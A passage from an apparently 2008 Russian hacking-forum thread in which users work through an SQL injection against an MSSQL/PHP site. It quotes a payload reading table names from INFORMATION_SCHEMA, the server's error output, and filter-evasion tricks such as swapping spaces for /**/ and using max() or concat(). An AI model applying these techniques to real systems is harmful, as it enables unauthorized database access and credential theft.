08.02.2008, 07:14
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Просто нет походу ничего в этой табличке, т.е. запрос ничего не возвращает
__________________
Карфаген должен быть разрушен...
|
|
|
17.02.2008, 20:15
|
|
Новичок
Регистрация: 04.07.2007
Сообщений: 16
С нами:
9923439
Репутация:
22
|
|
Вот с поvощью инъекции можно узнать логин пользователя, а можно ли его пасс узнать?
И еще как можно обойти вот такое:
Код:
Incorrect syntax near
Оно не дает использовать top, from, bcp, exec =( |
|
|
|
17.02.2008, 21:19
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами:
10248806
Репутация:
2371
|
|
Кельт, фразу дальше мейби продлишь?
Неверный запрос ты составил вообще
Пароль можно вытащить если он в бд в незашифрованном виде...
|
|
|
|
17.02.2008, 21:32
|
|
Новичок
Регистрация: 04.07.2007
Сообщений: 16
С нами:
9923439
Репутация:
22
|
|
Фразу я не продлил потому как она на все перечисленные ниже слова ругается, к примеру, на запрос вида:
or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
вылетает ошибка:
Код:
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near the keyword 'TOP'. (severity 15)
Warning: mssql_query() [function.mssql-query]: Query failed
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
|
|
|
|
18.02.2008, 01:33
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами:
10248806
Репутация:
2371
|
|
Ну правильно....плюсы замени например на /**/
|
|
|
|
18.02.2008, 01:49
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
С нами:
10488959
Репутация:
474
|
|
>плюсы замени например на /**/
Mssql не поддерживает, если я не ошибаюсь, такой тип комментария
|
|
|
|
18.02.2008, 01:59
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от ENFIX
>плюсы замени например на /**/
Mssql не поддерживает, если я не ошибаюсь, такой тип комментария
Поддерживает, но обязательно что бы они были закрытыми, пробел так же можно заменить на /**/
2Кельт, иногда top фильтруется попробуй замени на max(table_name)
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 18.02.2008 в 02:02..
|
|
|
|
18.02.2008, 12:58
|
|
Новичок
Регистрация: 04.07.2007
Сообщений: 16
С нами:
9923439
Репутация:
22
|
|
что-то не помогает =(
при замене + на /**/ выдает:
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near '/'. (severity 15)
Warning: mssql_query() [function.mssql-query]: Query failed
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
При использовании max(table_name) начинает ругаться на from:
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near 'from'. (severity 15)
Warning: mssql_query() [function.mssql-query]: Query failed
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
|
|
|
|
18.02.2008, 14:17
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами:
10248806
Репутация:
2371
|
|
Поппробуй concat(table_name, 0x3a) заместо max(table_name)
|
|
|
|
18.02.2008, 14:45
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами:
10021597
Репутация:
905
|
|
Разве функция max() предназначена для строковых полей?
ЗЫ. Сорри, ступил, для них она тоже работает)
Последний раз редактировалось krypt3r; 18.02.2008 в 15:08..
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
